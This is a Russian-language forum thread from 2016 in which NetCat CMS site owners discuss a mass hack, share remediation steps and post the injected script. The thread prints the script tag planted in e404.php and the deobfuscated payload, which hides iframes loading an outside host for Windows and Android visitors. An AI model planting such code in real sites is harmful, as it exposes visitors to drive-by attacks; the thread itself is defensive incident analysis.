Регистрация
Вход через соцсети
Восстановление пароля

Пакетные взломы NetCat

Новый топик
29.04.2016, 10:36
Ответить | Цитировать
serguesqx
Клевер АС

Зарегистрирован:
2012-11-26
Сообщений: 19

Со вчерашнего дня пошли взломы сайтов на котах версий 5.0/5.2/5.3, внедряют в файл /netcat/require/e404.php такой скрипт:
Код:
<script src=http://webshop-tool-manager.info/statistic/googleapis.js></script>


Завирусили уже 6 сайтов, на всех есть формы с капчей.
Народ есть мысли, может сталкивался кто?

О, приветик.
29.04.2016, 11:38
Ответить | Цитировать
serguesqx
Клевер АС

Зарегистрирован:
2012-11-26
Сообщений: 19

Саппорт ответил, уезвимость закрывается так https://docs.google.com/document/d/1LCI2H5OuDhyK6KATYyjDsDA7mtVXRlBQRe5r4N76DtM/edit

О, приветик.
03.05.2016, 15:07
Ответить | Цитировать
Руслан Густокашин
Студия Вэлпис
Руслан Густокашин

Зарегистрирован:
2012-02-06
Сообщений: 869

Практически все более старые версии, кстати, тоже пострадали. Я расписал дополнительно подробно об уязвимости, на всякий случай почитайте.

04.05.2016, 11:54
Ответить | Цитировать
Pavel

Зарегистрирован:
2007-10-20
Сообщений: 50

а что делает скрипт http://webshop-tool-manager.info/statistic/googleapis.js - кто-то знает? Что-то надо посоветовать тем, кто зашел на сайт во время заражения?

спасибо за инструкцию!!!
04.05.2016, 12:07
Ответить | Цитировать
Руслан Густокашин
Студия Вэлпис
Руслан Густокашин

Зарегистрирован:
2012-02-06
Сообщений: 869

Да непонятно. Мы раскодировали его, но ничего толком не поняли.
С куками что-то творит, возможно ворует их (чтобы авторизовываться потом без пароля в админке).
По айфреймам, которые генерит этот скрипт, не удалось разобраться, что они делают - перекидывает на yahoo.
Рекомендую сделать в SQL-консоли truncate table Session (чтобы перестали действовать все старые сохраненные сеансы работы) и после этого поменять пароль всем админам пароли в админке.
MySQL'ный пароль вряд ли стащили, но тоже для безопасности лучше поменять.
А вот на FTP и на панель хостинга пароли менять бессмысленно - их своровать через эту дырку технически невозможно.

04.05.2016, 13:03
Ответить | Цитировать
Руслан Густокашин
Студия Вэлпис
Руслан Густокашин

Зарегистрирован:
2012-02-06
Сообщений: 869

Вот, кстати, этот скрипт в раскодированном виде. Может кто чего поймет.улыбка
Код:

function check_os() {
var _0x890dx2 = navigator['userAgent']['toLowerCase']();
if ((_0x890dx2['indexOf']('windows') !== -1) && (_0x890dx2['indexOf']('safari') == -1)) {
return 'win'
} else {
if (_0x890dx2['indexOf']('android') !== -1) {
return 'android'
}
}
}
function getCookie(_0x890dx4) {
var _0x890dx5 = document['cookie']['match'](new RegExp('(?:^|; )' + _0x890dx4['replace'](/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\$1') + '=([^;]*)'));
return _0x890dx5 ? decodeURIComponent(_0x890dx5[1]) : undefined
}
result = check_os();
cook = null;
cook = getCookie('googlewebmapi6');
if (cook == null || cook == 'NaN1') {
if (result == 'win' || result == 'android') {
if (result == 'win') {
var div = document['createElement']('div');
div['style']['position'] = 'absolute';
div['style']['left'] = '-3000px';
div['style']['top'] = '-1000px';
div['innerHTML'] = '<iframe src=\'http://pestcontrolfinder.net.au/?PKqBx3\' width=\'0\' height=\'0\'>';
document['body']['appendChild'](div)
} else {
if (result == 'android') {
var div = document['createElement']('div');
div['style']['position'] = 'absolute';
div['style']['left'] = '0px';
div['style']['top'] = '0px';
win_w = document['body']['clientWidth'];
win_h = document['body']['clientHeight'];
div['innerHTML'] = '<iframe src=\'http://pestcontrolfinder.net.au/?sKT8dW\' width=' + win_w + ' height=' + win_h + '>';
document['body']['appendChild'](div)
}
}
}
};
if (cook != 'NaN1111') {
cook = cook + 1;
document['cookie'] = 'googlewebmapi6=' + cook
}


198 196 2016-05-04 13:03:26 14509
Описание проекта